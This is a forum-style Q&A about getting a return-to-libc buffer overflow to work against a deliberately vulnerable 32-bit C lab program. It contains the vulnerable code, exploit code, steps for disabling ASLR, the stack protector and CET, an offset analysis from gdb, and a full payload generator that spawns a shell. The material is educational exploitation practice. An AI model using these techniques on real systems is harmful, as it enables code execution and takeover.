Return to libc buffer overflow attack
I tried to make a return to libc buffer overflow. I found all the addresses for system, exit and /bin/sh, I don't know why, but when I try to run the vulnerable program nothing happens.
(image: system and exit addresses) (image: /bin/sh address)
Vulnerable program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

#ifndef BUF_SIZE
#define BUF_SIZE 12
#endif

int bof(FILE* badfile)
{
    char buffer[BUF_SIZE];
    /* reads up to 300 bytes into a 12-byte stack buffer: the overflow */
    fread(buffer, sizeof(char), 300, badfile);
    return 1;
}

int main(int argc, char** argv)
{
    FILE* badfile;
    char dummy[BUF_SIZE * 5];
    badfile = fopen("badfile", "r");
    bof(badfile);
    printf("Return properly.\n");
    fclose(badfile);
    return 1;
}
Exploit program:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
    char buf[40];
    FILE* badfile;
    badfile = fopen("./badfile", "w");
    *(long *) &buf[24] = 0xbffffe1e; // /bin/sh
    *(long *) &buf[20] = 0xb7e369d0; // exit
    *(long *) &buf[16] = 0xb7e42da0; // system
    fwrite(buf, sizeof(buf), 1, badfile);
    fclose(badfile);
    return 1;
}
And this is the program that I use to find the MYSHELL address (for /bin/sh):
#include <stdio.h>
#include <stdlib.h>  /* getenv() */

int main(void)
{
    char* shell = getenv("MYSHELL");
    if (shell)
        printf("%x\n", (unsigned int) shell);
    return 0;
}
Terminal: (image: terminal output after running retlib)
First, there are a number of mitigations that might be deployed to prevent this attack. You need to disable each one:

- ASLR: you have already disabled it using sudo sysctl -w kernel.randomize_va_space=0. But a better option is to disable it only for one shell and its children: setarch $(uname -m) -R /bin/bash
- Stack protector: this can be disabled using -fno-stack-protector.
- CET: this (along with some other CET protections) can be disabled using -fcf-protection=none.

The question does not mention it, but the addresses used in the code (along with the use of long) indicate that a 32-bit system is targeted. If the system used is 64-bit, -m32 needs to be added to the compiler flags:

gcc -fno-stack-protector -fcf-protection=none -m32 vulnerable.c
When determining the environment variable address from one binary and using it in another, it is really important that their environment variables and invocation from the shell are identical (at least in length). If one is executed as a.out, the other should also be executed as a.out. One being in a different path, or having a different argv, will move the environment variable.

Alternatively, you can print the address of the environment variable from within the vulnerable binary.

By looking at the disassembly of the bof function, the distance between the buffer and the return address can be determined:
(gdb) disassemble bof
Dump of assembler code for function bof:
0x565561dd <+0>: push %ebp
0x565561de <+1>: mov %esp,%ebp
0x565561e0 <+3>: push %ebx
0x565561e1 <+4>: sub $0x14,%esp
0x565561e4 <+7>: call 0x56556286 <__x86.get_pc_thunk.ax>
0x565561e9 <+12>: add $0x2de3,%eax
0x565561ee <+17>: pushl 0x8(%ebp)
0x565561f1 <+20>: push $0x12c
0x565561f6 <+25>: push $0x1
0x565561f8 <+27>: lea -0x14(%ebp),%edx
0x565561fb <+30>: push %edx
0x565561fc <+31>: mov %eax,%ebx
0x565561fe <+33>: call 0x56556050 <fread@plt>
0x56556203 <+38>: add $0x10,%esp
0x56556206 <+41>: mov $0x1,%eax
0x5655620b <+46>: mov -0x4(%ebp),%ebx
0x5655620e <+49>: leave
0x5655620f <+50>: ret
End of assembler dump.
Note that -0x14(%ebp) is used as the first parameter to fread, which is the buffer that will be overflowed. Also note that ebp was the value of esp just after pushing ebp in the first instruction. So, ebp points to the saved ebp, which is followed by the return address. That means from the start of the buffer, the saved ebp is 20 bytes away, and the return address is 24 bytes away.
*(long *) &buf[32] = ...; // /bin/sh
*(long *) &buf[28] = ...; // exit
*(long *) &buf[24] = ...; // system
With these changes, the shell is executed by the vulnerable binary:
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709328 pts/1 00:00:00 ps
$ ./a.out
$ ps
PID TTY TIME CMD
1664961 pts/1 00:00:00 bash
1706389 pts/1 00:00:00 bash
1709329 pts/1 00:00:00 a.out
1709330 pts/1 00:00:00 sh
1709331 pts/1 00:00:00 sh
1709332 pts/1 00:00:00 ps
$
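The answer's first step is to confirm that every mitigation is really off and that the binary is really a 32-bit build. The following pre-flight check is an added example, not code from the question or the answer: it reads the ELF header of the vulnerable binary to confirm a 32-bit x86 target (what the 4-byte addresses and -m32 assume), scans the image for the __stack_chk_fail import that a canary-protected build pulls in from libc (a plain string scan, so treat it as a hint), reads kernel.randomize_va_space, and queries the process personality for ADDR_NO_RANDOMIZE, which is what setarch -R sets and child processes inherit. It is Linux-only; the function and enum names are this example's own.

```c
/* Added example (not from the question or the answer): check the assumptions
 * a 32-bit ret2libc exploit relies on before chasing offsets. Linux-only. */
#include <elf.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/personality.h>

enum target_kind {
    TARGET_NOT_ELF     = -1,
    TARGET_ELF32_X86   =  1,   /* what the 4-byte addresses in the exploit assume */
    TARGET_ELF32_OTHER =  2,
    TARGET_ELF64       =  3    /* built without -m32: long is 8 bytes, frame differs */
};

/* Classify an in-memory ELF image from its header alone. e_machine is copied
 * out with memcpy because img may be unaligned; x86 ELF is little-endian. */
int classify_elf(const unsigned char *img, size_t len)
{
    if (len < EI_NIDENT || memcmp(img, ELFMAG, SELFMAG) != 0)
        return TARGET_NOT_ELF;
    if (img[EI_CLASS] == ELFCLASS64)
        return TARGET_ELF64;
    if (img[EI_CLASS] != ELFCLASS32 || len < sizeof(Elf32_Ehdr))
        return TARGET_NOT_ELF;
    Elf32_Half machine;
    memcpy(&machine, img + offsetof(Elf32_Ehdr, e_machine), sizeof machine);
    return machine == EM_386 ? TARGET_ELF32_X86 : TARGET_ELF32_OTHER;
}

/* 1 if the image contains "__stack_chk_fail" (imported by canary-protected
 * builds), 0 otherwise. A string scan: a hint, not proof of -fno-stack-protector. */
int has_stack_protector(const unsigned char *img, size_t len)
{
    static const char needle[] = "__stack_chk_fail";
    const size_t n = sizeof needle - 1;
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(img + i, needle, n) == 0)
            return 1;
    return 0;
}

/* kernel.randomize_va_space: 0 = off, 1 = partial, 2 = full; -1 if unreadable. */
int read_aslr_sysctl(void)
{
    FILE *f = fopen("/proc/sys/kernel/randomize_va_space", "r");
    int v = -1;
    if (f) {
        if (fscanf(f, "%d", &v) != 1)
            v = -1;
        fclose(f);
    }
    return v;
}

/* 1 if this process carries ADDR_NO_RANDOMIZE (inherited from a shell started
 * with setarch -R), 0 otherwise. personality(0xffffffff) only queries. */
int aslr_off_for_this_process(void)
{
    int persona = personality(0xffffffff);
    return (persona != -1 && (persona & ADDR_NO_RANDOMIZE)) ? 1 : 0;
}

/* Read a whole file into a malloc'd buffer; NULL on failure. */
static unsigned char *slurp(const char *path, size_t *len)
{
    FILE *f = fopen(path, "rb");
    if (!f) return NULL;
    unsigned char *buf = NULL;
    size_t cap = 0, n = 0, got;
    do {
        if (n == cap) {
            cap = cap ? cap * 2 : 65536;
            unsigned char *nb = realloc(buf, cap);
            if (!nb) { free(buf); fclose(f); return NULL; }
            buf = nb;
        }
        got = fread(buf + n, 1, cap - n, f);
        n += got;
    } while (got > 0);
    fclose(f);
    *len = n;
    return buf;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s ./a.out\n", argv[0]); return 2; }
    size_t len;
    unsigned char *img = slurp(argv[1], &len);
    if (!img) { perror(argv[1]); return 1; }
    int kind = classify_elf(img, len);
    printf("target:           %s\n",
           kind == TARGET_ELF32_X86 ? "ELF32 x86 (ok)" :
           kind == TARGET_ELF64 ? "ELF64 (rebuild with -m32)" :
           kind == TARGET_ELF32_OTHER ? "ELF32, not x86" : "not an ELF file");
    printf("stack protector:  %s\n", has_stack_protector(img, len)
           ? "present (rebuild with -fno-stack-protector)" : "not found");
    int rnd = read_aslr_sysctl();
    printf("ASLR sysctl:      %d%s\n", rnd, rnd == 0 ? " (off system-wide)" : "");
    printf("ASLR personality: %s\n", aslr_off_for_this_process()
           ? "ADDR_NO_RANDOMIZE set (off for this shell and its children)" : "not set");
    free(img);
    return 0;
}
```

Run it from the same shell you will launch the vulnerable binary from, since the personality check reports the inherited value; ASLR is effectively off for the target if either the sysctl is 0 or ADDR_NO_RANDOMIZE is set.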
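The answer derives the frame layout from the disassembly (buffer at -0x14(%ebp), saved ebp 20 bytes in, return address 24 bytes in) and then moves the three addresses accordingly. The generator below is an added example, not the question's or the answer's code: it encodes that layout once, writes every address as an explicit 4-byte little-endian value (so it produces the same file whether it is built with -m32 or as a 64-bit host program, where long would be 8 bytes and silently shift the chain), and takes the three addresses from the command line. The addresses in the usage message are the ones from the question and are placeholders; take yours from gdb (p system, p exit) and the MYSHELL helper on your own machine.

```c
/* Added example (not from the question or the answer): badfile generator
 * using the offsets derived from the disassembly of bof(). */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_OFF     0x14  /* lea -0x14(%ebp),%edx: buffer starts 20 bytes below ebp */
#define PAYLOAD_LEN 40    /* bof() asks fread for 300 bytes but stops at EOF; 40 suffices */

/* Frame of bof() after "push %ebp; mov %esp,%ebp":
 *   buffer          = ebp - 0x14  -> payload[0]
 *   saved ebp       = ebp         -> payload[20]  (filler, never dereferenced)
 *   return address  = ebp + 4     -> payload[24]  <- &system
 *   system()'s own return address -> payload[28]  <- &exit
 *   system()'s first argument     -> payload[32]  <- &"/bin/sh" (MYSHELL) */
enum {
    OFF_SAVED_EBP = BUF_OFF,
    OFF_RET       = BUF_OFF + 4,
    OFF_RET_AFTER = BUF_OFF + 8,
    OFF_ARG       = BUF_OFF + 12
};

/* Store v at out[off], 4 bytes wide, x86 (little-endian) byte order. */
static void put32(uint8_t *out, size_t off, uint32_t v)
{
    for (int i = 0; i < 4; i++)
        out[off + i] = (uint8_t)(v >> (8 * i));
}

/* Read back a 4-byte little-endian value; used to verify a built payload. */
uint32_t get32(const uint8_t *in, size_t off)
{
    uint32_t v = 0;
    for (int i = 0; i < 4; i++)
        v |= (uint32_t)in[off + i] << (8 * i);
    return v;
}

/* Fill out[0..PAYLOAD_LEN) with the ret2libc chain. Returns the number of
 * bytes written, or 0 if cap cannot hold the whole chain. */
size_t build_payload(uint8_t *out, size_t cap,
                     uint32_t system_addr, uint32_t exit_addr, uint32_t binsh_addr)
{
    if (cap < PAYLOAD_LEN || OFF_ARG + 4 > PAYLOAD_LEN)
        return 0;
    memset(out, 'A', PAYLOAD_LEN);          /* filler, including the saved-ebp slot   */
    put32(out, OFF_RET,       system_addr); /* bof()'s ret lands in system()           */
    put32(out, OFF_RET_AFTER, exit_addr);   /* system() returns into exit(): no crash  */
    put32(out, OFF_ARG,       binsh_addr);  /* system()'s argument: the MYSHELL string */
    return PAYLOAD_LEN;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <system> <exit> <binsh> (hex, e.g. b7e42da0 b7e369d0 bffffe1e)\n",
                argv[0]);
        return 2;
    }
    uint32_t sys_a  = (uint32_t)strtoul(argv[1], NULL, 16);
    uint32_t exit_a = (uint32_t)strtoul(argv[2], NULL, 16);
    uint32_t sh_a   = (uint32_t)strtoul(argv[3], NULL, 16);

    uint8_t payload[PAYLOAD_LEN];
    size_t n = build_payload(payload, sizeof payload, sys_a, exit_a, sh_a);
    if (n == 0)
        return 1;

    FILE *f = fopen("badfile", "wb");
    if (!f) { perror("badfile"); return 1; }
    if (fwrite(payload, 1, n, f) != n) { perror("fwrite"); fclose(f); return 1; }
    fclose(f);
    return 0;
}
```

Because bof() never returns to main() once the chain runs, nothing past payload[35] matters; the filler in the saved-ebp slot is harmless because system() builds its own frame before touching ebp.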